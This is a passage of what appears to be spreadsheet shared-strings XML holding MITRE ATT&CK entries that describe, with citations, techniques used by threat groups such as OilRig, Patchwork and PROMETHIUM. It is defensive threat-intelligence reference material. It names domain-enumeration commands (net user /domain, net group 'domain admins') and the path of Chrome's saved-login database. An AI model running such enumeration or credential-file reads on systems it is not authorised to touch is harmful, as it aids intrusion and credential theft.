    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used a CHM payload to load and execute another malicious file once delivered to a victim.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used credential dumping tools such as [LaZagne](https://attack.mitre.org/software/S0349) to steal credentials to accounts logged into the compromised system and to Outlook Web Access.(Citation: Unit 42 Playbook Dec 2017)(Citation: FireEye APT34 Webinar Dec 2017)(Citation: FireEye APT35 2018)(Citation: FireEye APT34 July 2019) [OilRig](https://attack.mitre.org/groups/G0049) has also used tool named PICKPOCKET to dump passwords from web browsers.(Citation: FireEye APT34 July 2019)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used DNS for C2 including the publicly available &lt;code&gt;requestbin.net&lt;/code&gt; tunneling service.(Citation: Unit 42 Playbook Dec 2017)(Citation: FireEye APT34 Webinar Dec 2017)(Citation: FireEye APT34 July 2019)(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>A [OilRig](https://attack.mitre.org/groups/G0049) macro has run a PowerShell command to decode file contents. [OilRig](https://attack.mitre.org/groups/G0049) has also used [certutil](https://attack.mitre.org/software/S0160) to decode base64-encoded files on victims.(Citation: FireEye APT34 Dec 2017)(Citation: OilRig New Delivery Oct 2017)(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has run &lt;code&gt;net user&lt;/code&gt;, &lt;code&gt;net user /domain&lt;/code&gt;, &lt;code&gt;net group “domain admins” /domain&lt;/code&gt;, and &lt;code&gt;net group “Exchange Trusted Subsystem” /domain&lt;/code&gt; to get account listings on a victim.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used &lt;code&gt;net group /domain&lt;/code&gt;, &lt;code&gt;net group “domain admins” /domain&lt;/code&gt;, and &lt;code&gt;net group “Exchange Trusted Subsystem” /domain&lt;/code&gt; to find domain group permission settings.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has exfiltrated data over FTP separately from its primary C2 channel over DNS.(Citation: Palo Alto OilRig Oct 2016)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) uses remote services such as VPN, Citrix, or OWA to persist in an environment.(Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) malware ISMAgent falls back to its DNS tunneling mechanism if it is unable to reach the C2 server over HTTP.(Citation: OilRig ISMAgent July 2017)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has deleted files associated with their payload after execution.(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has tested malware samples to determine AV detection and subsequently modified the samples to ensure AV evasion.(Citation: Palo Alto OilRig April 2017)(Citation: Unit42 OilRig Nov 2018)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) can download remote files onto victims.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[OilRig](https://attack.mitre.org/groups/G0049) has used keylogging tools called KEYPUNCH and LONGWATCH.(Citation: FireEye APT34 Webinar Dec 2017)(Citation: FireEye APT34 July 2019)	
</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used credential dumping tools such as [Mimikatz](https://attack.mitre.org/software/S0002) to steal credentials to accounts logged into the compromised system and to Outlook Web Access.(Citation: Unit 42 Playbook Dec 2017)(Citation: FireEye APT34 Webinar Dec 2017)(Citation: FireEye APT35 2018)(Citation: FireEye APT34 July 2019)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used &lt;code&gt;net localgroup administrators&lt;/code&gt; to find local administrators on compromised systems.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has delivered macro-enabled documents that required targets to click the "enable content" button to execute the payload on the system.(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 QUADAGENT July 2018)(Citation: Crowdstrike Helix Kitten Nov 2018)(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has delivered malicious links to achieve execution on the target system.(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 QUADAGENT July 2018)(Citation: Crowdstrike Helix Kitten Nov 2018)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used .doc file extensions to mask malicious executables.(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used the publicly available tool SoftPerfect Network Scanner as well as a custom tool called GOLDIRONY to conduct network scanning.(Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has encrypted and encoded data in its malware, including by using base64.(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018)(Citation: Unit 42 Playbook Dec 2017)(Citation: Crowdstrike Helix Kitten Nov 2018)(Citation: Unit42 OilRig Nov 2018)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has abused the Outlook Home Page feature for persistence. [OilRig](https://attack.mitre.org/groups/G0049) has also used CVE-2017-11774 to roll back the initial patch designed to protect against Home Page abuse.(Citation: FireEye Outlook Dec 2019)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used net.exe in a script with &lt;code&gt;net accounts /domain&lt;/code&gt; to find the password policy of a domain.(Citation: FireEye Targeted Attacks Middle East Banks)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used tools to identify if a mouse is connected to a targeted system.(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used PowerShell scripts for execution, including use of a macro to run a PowerShell command to decode file contents.(Citation: FireEye APT34 Dec 2017)(Citation: OilRig New Delivery Oct 2017)(Citation: Crowdstrike Helix Kitten Nov 2018)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has run &lt;code&gt;tasklist&lt;/code&gt; on a victim's machine.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used the Plink utility and other tools to create tunnels to C2 servers.(Citation: Unit 42 Playbook Dec 2017)(Citation: FireEye APT34 Webinar Dec 2017)(Citation: FireEye APT34 July 2019)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used &lt;code&gt;reg query “HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default”&lt;/code&gt; on a victim to query the Registry.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used Remote Desktop Protocol for lateral movement. The group has also used tunneling tools to tunnel RDP into the environment.(Citation: Unit 42 Playbook Dec 2017)(Citation: FireEye APT34 Webinar Dec 2017)(Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used Putty to access compromised systems.(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has created scheduled tasks that run a VBScript to execute a payload on victim machines.(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 QUADAGENT July 2018)(Citation: FireEye APT34 July 2019)(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has a tool called CANDYKING to capture a screenshot of user's desktop.(Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has sent spearphising emails with malicious attachments to potential victims using compromised and/or spoofed email accounts.(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 QUADAGENT July 2018)(Citation: Crowdstrike Helix Kitten Nov 2018)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has sent spearphising emails with malicious links to potential victims.(Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used LinkedIn to send spearphishing links.(Citation: FireEye APT34 July 2019)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used macros to verify if a mouse is connected to a compromised machine.(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[OilRig](https://attack.mitre.org/groups/G0049) has run &lt;code&gt;hostname&lt;/code&gt; and &lt;code&gt;systeminfo&lt;/code&gt; on a victim.(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: FireEye APT34 July 2019)(Citation: Check Point APT34 April 2021)	</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has run &lt;code&gt;ipconfig /all&lt;/code&gt; on a victim.(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used &lt;code&gt;netstat -an&lt;/code&gt; on a victim to get a listing of network connections.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has run &lt;code&gt;whoami&lt;/code&gt; on a victim.(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used &lt;code&gt;sc query&lt;/code&gt; on a victim to gather information about services.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used compromised credentials to access other systems on a victim network.(Citation: Unit 42 Playbook Dec 2017)(Citation: FireEye APT34 Webinar Dec 2017)(Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used VBSscipt macros for execution on compromised hosts.(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used HTTP for C2.(Citation: Unit 42 Playbook Dec 2017)(Citation: FireEye APT34 Webinar Dec 2017)(Citation: FireEye APT34 July 2019)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used web shells, often to maintain access to a victim network.(Citation: Unit 42 Playbook Dec 2017)(Citation: FireEye APT34 Webinar Dec 2017)(Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used macros to deliver malware such as [QUADAGENT](https://attack.mitre.org/software/S0269) and [OopsIE](https://attack.mitre.org/software/S0264).(Citation: FireEye APT34 Dec 2017)(Citation: OilRig ISMAgent July 2017)(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 QUADAGENT July 2018)(Citation: Unit42 OilRig Nov 2018) [OilRig](https://attack.mitre.org/groups/G0049) has used batch scripts.(Citation: FireEye APT34 Dec 2017)(Citation: OilRig ISMAgent July 2017)(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 QUADAGENT July 2018)(Citation: Unit42 OilRig Nov 2018)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used credential dumping tool named VALUEVAULT to steal credentials from the Windows Credential Manager.(Citation: FireEye APT34 July 2019)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used WMI for execution.(Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>[Orangeworm](https://attack.mitre.org/groups/G0071) has copied its backdoor across open network shares, including ADMIN$, C$WINDOWS, D$WINDOWS, and E$WINDOWS.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Orangeworm](https://attack.mitre.org/groups/G0071) has used HTTP for C2.(Citation: Symantec Orangeworm IOCs April 2018)</t>
  </si>
  <si>
    <t>[PLATINUM](https://attack.mitre.org/groups/G0068) is capable of using Windows hook interfaces for information gathering such as credential access.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[PLATINUM](https://attack.mitre.org/groups/G0068) has sometimes used drive-by attacks against vulnerable browser plugins.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[PLATINUM](https://attack.mitre.org/groups/G0068) has leveraged a zero-day vulnerability to escalate privileges.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[PLATINUM](https://attack.mitre.org/groups/G0068) has transferred files using the Intel® Active Management Technology (AMT) Serial-over-LAN (SOL) channel.(Citation: Microsoft PLATINUM June 2017)</t>
  </si>
  <si>
    <t>[PLATINUM](https://attack.mitre.org/groups/G0068) has used several different keyloggers.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[PLATINUM](https://attack.mitre.org/groups/G0068) has used keyloggers that are also capable of dumping credentials.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[PLATINUM](https://attack.mitre.org/groups/G0068) has attempted to get users to open malicious files by sending spearphishing emails with attachments to victims.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[PLATINUM](https://attack.mitre.org/groups/G0068) has renamed rar.exe to avoid detection.(Citation: Twitter ItsReallyNick Platinum Masquerade)</t>
  </si>
  <si>
    <t>[PLATINUM](https://attack.mitre.org/groups/G0068) has used the Intel® Active Management Technology (AMT) Serial-over-LAN (SOL) channel for command and control.(Citation: Microsoft PLATINUM June 2017)</t>
  </si>
  <si>
    <t>[PLATINUM](https://attack.mitre.org/groups/G0068) has used various methods of process injection including hot patching.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[PLATINUM](https://attack.mitre.org/groups/G0068) has sent spearphishing emails with attachments to victims as its primary initial access vector.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[POLONIUM](https://attack.mitre.org/groups/G1005) has used OneDrive and DropBox for C2.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t xml:space="preserve">[POLONIUM](https://attack.mitre.org/groups/G1005) has exfiltrated stolen data to [POLONIUM](https://attack.mitre.org/groups/G1005)-owned OneDrive and Dropbox accounts.(Citation: Microsoft POLONIUM June 2022) </t>
  </si>
  <si>
    <t>[POLONIUM](https://attack.mitre.org/groups/G1005) has used the AirVPN service for operational activity.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t xml:space="preserve">[POLONIUM](https://attack.mitre.org/groups/G1005) has obtained and used tools such as AirVPN and plink in their operations.(Citation: Microsoft POLONIUM June 2022) </t>
  </si>
  <si>
    <t>[POLONIUM](https://attack.mitre.org/groups/G1005) has used compromised credentials from an IT company to target downstream customers including a law firm and aviation company.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>[POLONIUM](https://attack.mitre.org/groups/G1005) has used valid compromised credentials to gain access to victim environments.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>[POLONIUM](https://attack.mitre.org/groups/G1005) has created and used legitimate Microsoft OneDrive accounts for their operations.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>[PROMETHIUM](https://attack.mitre.org/groups/G0056) has signed code with self-signed certificates.(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[PROMETHIUM](https://attack.mitre.org/groups/G0056) has created self-signed certificates to sign malicious installers.(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[PROMETHIUM](https://attack.mitre.org/groups/G0056) has created self-signed digital certificates for use in HTTPS C2 traffic.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>[PROMETHIUM](https://attack.mitre.org/groups/G0056) has used watering hole attacks to deliver malicious versions of legitimate installers.(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[PROMETHIUM](https://attack.mitre.org/groups/G0056) has created admin accounts on a compromised host.(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[PROMETHIUM](https://attack.mitre.org/groups/G0056) has attempted to get users to execute compromised installation files for legitimate software including compression applications, security software, browsers, file recovery applications, and other tools and utilities.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[PROMETHIUM](https://attack.mitre.org/groups/G0056) has named services to appear legitimate.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[PROMETHIUM](https://attack.mitre.org/groups/G0056) has disguised malicious installer files by bundling them with legitimate software installers.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[PROMETHIUM](https://attack.mitre.org/groups/G0056) has used a script that configures the knockd service and firewall to only accept C2 connections from systems that use a specified sequence of knock ports.(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[PROMETHIUM](https://attack.mitre.org/groups/G0056) has used Registry run keys to establish persistence.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>[PROMETHIUM](https://attack.mitre.org/groups/G0056) has created new services and modified existing services for persistence.(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) encrypted the collected files' path with AES and then encoded them with base64.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) developed a file stealer to search C:\ and collect files with certain extensions. [Patchwork](https://attack.mitre.org/groups/G0040) also executed a script to enumerate all drives, store them as a list, and upload generated files to the C2 server.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) has used BITS jobs to download malicious payloads.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) apparently altered [NDiskMonitor](https://attack.mitre.org/software/S0272) samples by adding four bytes of random letters in a likely attempt to change the file hashes.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) bypassed User Access Control (UAC).(Citation: Cymmetria Patchwork)</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) has signed malware with self-signed certificates from fictitious and spoofed legitimate software companies.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) has created self-signed certificates from fictitious and spoofed legitimate software companies that were later used to sign malware.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) dumped the login data database from &lt;code&gt;\AppData\Local\Google\Chrome\User Data\Default\Login Data&lt;/code&gt;.(Citation: Cymmetria Patchwork)</t>
  </si>
  <si>
    <t>A [Patchwork](https://attack.mitre.org/groups/G0040) .dll that contains [BADNEWS](https://attack.mitre.org/software/S0128) is loaded and executed using DLL side-loading.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) collected and exfiltrated files from the infected system.(Citation: Cymmetria Patchwork)</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) hides base64-encoded and encrypted C2 server locations in comments on legitimate websites.(Citation: Securelist Dropping Elephant)</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) has used watering holes to deliver files with exploits to initial victims.(Citation: Symantec Patchwork)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) leveraged the DDE protocol to deliver their malware.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) uses malicious documents to deliver remote execution exploits as part of. The group has previously exploited CVE-2017-8570, CVE-2012-1856, CVE-2014-4114, CVE-2017-0199, CVE-2017-11882, and CVE-2015-1641.(Citation: Cymmetria Patchwork)(Citation: Securelist Dropping Elephant)(Citation: Symantec Patchwork)(Citation: PaloAlto Patchwork Mar 2018)(Citation: TrendMicro Patchwork Dec 2017)(Citation: Volexity Patchwork June 2018)(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) removed certain files and replaced them so they could not be retrieved.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>A [Patchwork](https://attack.mitre.org/groups/G0040) payload has searched all fixed drives on the victim for files matching a specified list of extensions.(Citation: Cymmetria Patchwork)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) payloads download additional files from the C2 server.(Citation: Securelist Dropping Elephant)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) copied all targeted files to a directory called index that was eventually uploaded to the C&amp;C server.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) embedded a malicious macro in a Word document and lured the victim to click on an icon to execute the malware.(Citation: TrendMicro Patchwork Dec 2017)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) has used spearphishing with links to try to get users to click, download and open malicious files.(Citation: Symantec Patchwork)(Citation: TrendMicro Patchwork Dec 2017)(Citation: Volexity Patchwork June 2018)(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) installed its payload in the startup programs folder as "Baidu Software Update." The group also adds its second stage payload to the startup programs as “Net Monitor."(Citation: Cymmetria Patchwork) They have also dropped [QuasarRAT](https://attack.mitre.org/software/S0262) binaries as files named microsoft_network.exe and crome.exe.(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>A [Patchwork](https://attack.mitre.org/groups/G0040) payload deletes Resiliency Registry keys created by Microsoft Office applications in an apparent effort to trick users into thinking there were no issues during application runs.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) has obfuscated a script with Crypto Obfuscator.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) used [PowerSploit](https://attack.mitre.org/software/S0194) to download payloads, run a reverse shell, and execute malware on the victim's machine.(Citation: Cymmetria Patchwork)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>A [Patchwork](https://attack.mitre.org/groups/G0040) payload uses process hollowing to hide the UAC bypass vulnerability exploitation inside svchost.exe.(Citation: Cymmetria Patchwork)</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) has added the path of its second-stage malware to the startup folder to achieve persistence. One of its file stealers has also persisted by adding a Registry Run key.(Citation: Cymmetria Patchwork)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) attempted to use RDP to move laterally.(Citation: Cymmetria Patchwork)</t>
  </si>
  <si>
    <t>A [Patchwork](https://attack.mitre.org/groups/G0040) file stealer can run a TaskScheduler DLL to add persistence.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) scanned the “Program Files” directories for a directory with the string “Total Security” (the installation path of the “360 Total Security” antivirus tool).(Citation: Cymmetria Patchwork)</t>
  </si>
  <si>
    <t>A [Patchwork](https://attack.mitre.org/groups/G0040) payload was packed with UPX.(Citation: Securelist Dropping Elephant)</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) has used spearphishing with an attachment to deliver files with exploits to initial victims.(Citation: Cymmetria Patchwork)(Citation: Securelist Dropping Elephant)(Citation: TrendMicro Patchwork Dec 2017)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) has used spearphishing with links to deliver files with exploits to initial victims. The group has also used embedded image tags (known as web bugs) with unique, per-recipient tracking links in their emails for the purpose of identifying which recipients opened messages.(Citation: Symantec Patchwork)(Citation: TrendMicro Patchwork Dec 2017)(Citation: Volexity Patchwork June 2018)(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) used Base64 to encode C2 traffic.(Citation: Cymmetria Patchwork)</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) collected the victim computer name, OS version, and architecture type and sent the information to its C2 server. [Patchwork](https://attack.mitre.org/groups/G0040) also enumerated all available drives on the victim's machine.(Citation: Cymmetria Patchwork)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) collected the victim username and whether it was running as admin, then sent the information to its C2 server.(Citation: Cymmetria Patchwork)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) has obtained and used open-source tools such as [QuasarRAT](https://attack.mitre.org/software/S0262).(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) used Visual Basic Scripts (VBS) on victim machines.(Citation: TrendMicro Patchwork Dec 2017)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) ran a reverse shell with Meterpreter.(Citation: Cymmetria Patchwork) [Patchwork](https://attack.mitre.org/groups/G0040) used JavaScript code and .SCT files on victim machines.(Citation: TrendMicro Patchwork Dec 2017)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>[PittyTiger](https://attack.mitre.org/groups/G0011) has obtained and used tools such as [Mimikatz](https://attack.mitre.org/software/S0002) and [gsecdump](https://attack.mitre.org/software/S0008).(Citation: Bizeul 2014)</t>
  </si>
  <si>
    <t>[PittyTiger](https://attack.mitre.org/groups/G0011) attempts to obtain legitimate credentials during operations.(Citation: Bizeul 2014)</t>
  </si>
  <si>
    <t>[Poseidon Group](https://attack.mitre.org/groups/G0033) searches for administrator accounts on both the local victim machine and the network.(Citation: Kaspersky Poseidon Group)</t>
  </si>
  <si>
    <t>[Poseidon Group](https://attack.mitre.org/groups/G0033) tools attempt to spoof anti-virus processes as a means of self-defense.(Citation: Kaspersky Poseidon Group)</t>
  </si>
  <si>
    <t>[Poseidon Group](https://attack.mitre.org/groups/G0033) conducts credential dumping on victims, with a focus on obtaining credentials belonging to domain and database servers.(Citation: Kaspersky Poseidon Group)</t>
  </si>
  <si>
    <t>The [Poseidon Group](https://attack.mitre.org/groups/G0033)'s Information Gathering Tool (IGT) includes PowerShell components.(Citation: Kaspersky Poseidon Group)</t>
  </si>
  <si>
    <t>After compromising a victim, [Poseidon Group](https://attack.mitre.org/groups/G0033) lists all running processes.(Citation: Kaspersky Poseidon Group)</t>
  </si>
  <si>
    <t>[Poseidon Group](https://attack.mitre.org/groups/G0033) obtains and saves information about victim network interfaces and addresses.(Citation: Kaspersky Poseidon Group)</t>
  </si>
  <si>
    <t>After compromising a victim, [Poseidon Group](https://attack.mitre.org/groups/G0033) discovers all running services.(Citation: Kaspersky Poseidon Group)</t>
  </si>
  <si>
    <t>Malware used by [Putter Panda](https://attack.mitre.org/groups/G0024) attempts to terminate processes corresponding to two components of Sophos Anti-Virus (SAVAdminService.exe and SavService.exe).(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>An executable dropped onto victims by [Putter Panda](https://attack.mitre.org/groups/G0024) aims to inject the specified DLL into a process that would normally be accessing the network, including Outlook Express (msinm.exe), Outlook (outlook.exe), Internet Explorer (iexplore.exe), and Firefox (firefox.exe).(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>Droppers used by [Putter Panda](https://attack.mitre.org/groups/G0024) use RC4 or a 16-byte XOR key consisting of the bytes 0xA0 – 0xAF to obfuscate payloads.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>A dropper used by [Putter Panda](https://attack.mitre.org/groups/G0024) installs itself into the ASEP Registry key &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; with a value named McUpdate.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/groups/G0048) has used search order hijacking to force TeamViewer to load a malicious DLL.(Citation: Group IB RTM August 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/groups/G0048) has used an RSS feed on Livejournal to update a list of encrypted C2 server names.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/groups/G0048) has distributed its malware via the RIG and SUNDOWN exploit kits, as well as online advertising network &lt;code&gt;Yandex.Direct&lt;/code&gt;.(Citation: ESET RTM Feb 2017)(Citation: ESET Buhtrap and Buran April 2019)</t>
  </si>
  <si>
